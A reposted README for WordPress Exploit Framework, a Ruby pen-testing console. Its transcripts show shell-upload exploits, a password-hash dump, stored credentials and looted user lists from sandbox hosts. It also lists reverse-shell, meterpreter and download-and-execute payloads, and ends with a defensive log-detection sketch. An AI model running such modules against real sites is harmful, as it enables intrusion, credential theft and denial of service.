WordPress Exploit Framework - A Ruby Tool For Wordpress Penetration Testing
WordPress Exploit Framework is an open source framework that is designed to aid in the penetration testing of WordPress systems.
Requirements:
- Ruby >= 2.4.4
How To Install WordPress Exploit Framework
To install the latest stable build, run gem install wpxf.
After installation, you can launch the WordPress Exploit Framework console by running wpxf.
Debian Systems:
If you have issues installing WPXF's dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:
sudo apt-get install build-essential patch
It's possible that important development header files are not installed on your system. If that is the case, install them:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
Windows Systems:
If you are experiencing errors that indicate that libcurl.dll could not be loaded, you will need to ensure the latest libcurl binary is included in your Ruby bin folder, or any other folder that is in your environment's PATH variable.
The latest version can be downloaded from curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as Win32 2000/XP zip 7.40.0 libcurl SSL. After downloading the archive, extract the contents of the bin directory into your Ruby bin directory (if prompted, don't overwrite any existing DLLs).
How To Use WordPress Exploit Framework
Start the WordPress Exploit Framework console by running wpxf. Once loaded, you'll be presented with the wpxf prompt. From here you can search for modules using the search command or load a module using the use command.
Loading a module into your environment will allow you to set options with the set command and view information about the module using info.
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/shell/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
Supported Commands:
- back
Changes the context of the session back to before loading the current module.
wpxf [exploit/shell/admin_shell_upload] > back
wpxf >
- check
Check if the currently loaded module can be used against the specified target.
wpxf [exploit/shell/admin_shell_upload] > check
[!] Target appears to be vulnerable
wpxf [exploit/shell/admin_shell_upload] >
- clear
Clear the screen.
- creds
List the credentials stored in the current workspace.
wpxf > creds

ID  Host             Username  Password  Type
--  ---------------  --------  --------  -----
13  wordpress.vm:80  root      toor      plain
14  wordpress.vm:80  test                plain

wpxf >
- creds -d [id]
Delete the credential with the matching [id] number.
wpxf > creds -d 8
[+] Deleted credential 8
wpxf >
- gset
Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wordpress.vm
[+] Globally set the value of host to wordpress.vm
wpxf > use exploit/shell/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>
wpxf [exploit/shell/admin_shell_upload] > show options

Module options:

Name                 Current Setting  Required  Description
-------------------  ---------------  --------  -------------------------------------------
host                 wordpress.vm     true      Address of the target host.
http_client_timeout  5                true      Max wait time in seconds for HTTP responses
password                              true      The WordPress password to authenticate with
port                 80               true      Port the remote host is listening on
proxy                                 false     Proxy address ([protocol://]host:port)
ssl                  false            true      Use SSL/HTTPS for all requests
target_uri           /                true      Base path to the WordPress application
username                              true      The WordPress username to authenticate with
verbose              false            true      Enable verbose output
vhost                                 false     HTTP server virtual host

wpxf [exploit/shell/admin_shell_upload] >
- gunset
Unset a global option set with the gset command.
wpxf > gunset host
[+] Removed the global setting for host
wpxf >
- info
wpxf [exploit/shell/admin_shell_upload] > info

Name: Admin Shell Upload
Module: exploit/shell/admin_shell_upload
Disclosed: 2015-02-21

Provided by:
rastating

Module options:

Name        Current Setting  Required  Description
----------  ---------------  --------  -------------------------------------------
host        wordpress.vm     true      Address of the target host.
password    toor             true      The WordPress password to authenticate with
port        80               true      Port the remote host is listening on
proxy                        false     Proxy address ([protocol://]host:port)
ssl         false            true      Use SSL/HTTPS for all requests
target_uri  /                true      Base path to the WordPress application
username    root             true      The WordPress username to authenticate with
verbose     false            true      Enable verbose output
vhost                        false     HTTP server virtual host

Description:
This module will generate a plugin, pack the payload into it and upload it to a server running WordPress; providing valid admin credentials are used.

wpxf [exploit/shell/admin_shell_upload] >
- loot
List the loot collected from targets in the current workspace.
wpxf > loot

ID  Host             Filename                 Notes                                  Type
--  ---------------  -----------------------  -------------------------------------  ---------
1   wordpress.vm:80  2018-07-14_15-00-56.csv  Registered users and e-mail addresses  user list

All filenames are relative to /home/rastating/.wpxf/loot

wpxf >
- loot -d [id]
Delete the loot item with the matching [id] number.
wpxf > loot -d 1
[+] Deleted item 1
wpxf >
- loot -p [id]
wpxf > loot -p 2
Email,Name
"lPBrOHC@mBeTjaAGGh.com","atgvrf"
"gSLzaYG@uZVUAeSJvj.com","dowzvc"
"AMfWgAH@uDNuULjBQv.com","efhkjv"
"halFIgH@CYqrzDzwQU.com","omquqt"
"root@wordpress.vm","root"
wpxf >
- quit
Exit the WordPress Exploit Framework prompt.
- rebuild_cache
Re-build the module cache.
wpxf > rebuild_cache
[!] Refreshing the module cache...
wpxf >
- run
Run the currently loaded module.
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run
[-] Determining database prefix...
[-] Dumping user hashes...

Username  Hash
--------  -----------------------------------
root      $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80
ATgVrF    $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
DOWzVC    $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB.
OmQUqt    $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/
eFhkJv    $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.

[+] Execution finished successfully
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >
- set
Set an option value for the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > set host wordpress.vm
[+] Set host => wordpress.vm
wpxf [exploit/shell/admin_shell_upload] >
- setg
Alias for gset.
- search
Search for modules that contain one or more of the specified keywords.
wpxf > search rfi
[+] 3 Results for "rfi"

Module                                              Title
--------------------------------------------------  ----------------------------------------
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload  Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload  Flickr Picture Backup RFI Shell Upload
exploit/rfi/wp_mobile_detector_rfi_shell_upload     WP Mobile Detector RFI Shell Upload

wpxf >
- show advanced
Show the advanced options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show advanced

Name: basic_auth_creds
Current setting:
Required: false
Description: HTTP basic auth credentials (username:password)

Name: follow_http_redirection
Current setting: true
Required: true
Description: Automatically follow HTTP redirections

Name: max_http_concurrency
Current setting: 20
Required: true
Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200)

Name: proxy_auth_creds
Current setting:
Required: false
Description: Proxy server credentials (username:password)

Name: user_agent
Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6
Required: false
Description: The user agent string to send with all requests

Name: verify_host
Current setting: true
Required: true
Description: Enable host verification when using HTTPS

Name: wp_content_dir
Current setting: wp-content
Required: true
Description: The name of the wp-content directory.

wpxf [exploit/shell/admin_shell_upload] >
- show auxiliary
Show the list of available auxiliary modules.
wpxf > show auxiliary
[+] 58 Auxiliaries

Module                                  Title
--------------------------------------  -----------------------------------------------------------
auxiliary/dos/load_scripts_dos          WordPress "load-scripts.php" DoS
auxiliary/dos/long_password_dos         Long Password DoS
auxiliary/dos/post_grid_file_deletion   Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion
auxiliary/dos/wp_v4.7.2_csrf_dos        WordPress 4.2-4.7.2 - CSRF DoS
...

wpxf >
- show exploits
Show the list of available exploits.
wpxf > show exploits
[+] 289 Exploits

Module                                                    Title
--------------------------------------------------------  --------------------------------------------
exploit/rfi/advanced_custom_fields_remote_file_inclusion  Advanced Custom Fields Remote File Inclusion
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload        Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload        Flickr Picture Backup RFI Shell Upload
exploit/rfi/gwolle_guestbook_remote_file_inclusion        Gwolle Guestbook Remote File Inclusion
exploit/rfi/wp_mobile_detector_rfi_shell_upload           WP Mobile Detector RFI Shell Upload
...

wpxf >
- show options
Show the basic options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show options

Module options:

Name                 Current Setting  Required  Description
-------------------  ---------------  --------  -------------------------------------------
host                 wordpress.vm     true      Address of the target host.
http_client_timeout  5                true      Max wait time in seconds for HTTP responses
password                              true      The WordPress password to authenticate with
port                 80               true      Port the remote host is listening on
proxy                                 false     Proxy address ([protocol://]host:port)
ssl                  false            true      Use SSL/HTTPS for all requests
target_uri           /                true      Base path to the WordPress application
username                              true      The WordPress username to authenticate with
verbose              false            true      Enable verbose output
vhost                                 false     HTTP server virtual host

wpxf [exploit/shell/admin_shell_upload] >
- unset
Unset an option set with the set command.
wpxf [exploit/shell/admin_shell_upload] > unset host
[+] Unset host
wpxf [exploit/shell/admin_shell_upload] >
- unsetg
Alias for gunset.
- use
Load the specified module into the current context.
wpxf > use exploit/shell/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>
wpxf [exploit/shell/admin_shell_upload] >
- workspace
wpxf > workspace
[-] default (active)
[-] test
wpxf >
- workspace [name]
Switch to the [name] workspace.
wpxf > workspace test
[+] Switched to workspace: test
wpxf >
- workspace -a [name]
Add a new workspace.
wpxf > workspace -a wiki
[+] Added workspace: wiki
wpxf >
- workspace -d [name]
Delete the [name] workspace.
wpxf > workspace -d wiki
[+] Deleted workspace: wiki
wpxf >
Difference Between Auxiliary and Exploit Modules
Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
Available Payloads
- bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
- custom: uploads and executes a custom PHP script.
- download_exec: downloads and runs a remote executable file.
- meterpreter_bind_tcp: a Meterpreter bind TCP payload generated using msfvenom.
- meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated using msfvenom.
- exec: runs a shell command on the remote server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that will establish a reverse TCP shell.
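From the defender's side, the admin_shell_upload behaviour described in the info output above (a plugin is generated, uploaded with admin credentials, and its payload then run) leaves a recognisable pair of requests in the web server access log. The following Ruby sketch is an added example, not part of WPXF or the original page: it flags a successful plugin upload followed shortly by a direct request to a PHP file under the plugins directory from the same client. The log lines are constructed, and the combined log format, the 60-second window, the function name and the assumption that the payload is reached by a direct request are all assumptions.

```ruby
require 'time'

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [14/Jul/2018:15:00:50 +0000] "POST /wp-login.php HTTP/1.1" 302 0
  203.0.113.7 - - [14/Jul/2018:15:00:52 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 5120
  203.0.113.7 - - [14/Jul/2018:15:00:53 +0000] "GET /wp-content/plugins/qzkfhw/lmxpra.php HTTP/1.1" 200 14
  198.51.100.4 - - [14/Jul/2018:15:02:10 +0000] "GET /wp-content/plugins/akismet/akismet.php HTTP/1.1" 200 0
  198.51.100.9 - - [14/Jul/2018:15:05:00 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 7300
  198.51.100.9 - - [14/Jul/2018:15:09:00 +0000] "GET /wp-content/plugins/seo-tools/readme.php HTTP/1.1" 200 90
LOG

LINE_RE = %r{\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})}
# WordPress admin endpoint that receives an uploaded plugin archive.
UPLOAD_RE = %r{/wp-admin/update\.php\?(?:.*&)?action=upload-plugin}
# Assumes the default wp-content directory name; adjust if the site renames it.
PLUGIN_PHP_RE = %r{/wp-content/plugins/[^/]+/[^?]+\.php(?:\?|\z)}

# Returns one alert per plugin PHP request that follows a successful
# plugin upload from the same client IP within `window` seconds.
def find_upload_then_exec(log, window: 60)
  uploads = {} # client IP => time of its last successful plugin upload
  alerts = []
  log.each_line do |line|
    m = LINE_RE.match(line) or next
    ip, stamp, verb, path, status = m.captures
    time = Time.strptime(stamp, '%d/%b/%Y:%H:%M:%S %z')
    if verb == 'POST' && path =~ UPLOAD_RE && status == '200'
      uploads[ip] = time
    elsif path =~ PLUGIN_PHP_RE && uploads[ip] && (time - uploads[ip]) <= window
      alerts << { ip: ip, path: path, seconds_after_upload: (time - uploads[ip]).to_i }
    end
  end
  alerts
end

find_upload_then_exec(SAMPLE_LOG).each do |a|
  puts "ALERT #{a[:ip]} requested #{a[:path]} #{a[:seconds_after_upload]}s after a plugin upload"
end
```

Legitimate plugin installs also hit the upload endpoint, so the short window and the same-client correlation are what keep the signal useful; tune both against your own administrators' normal behaviour.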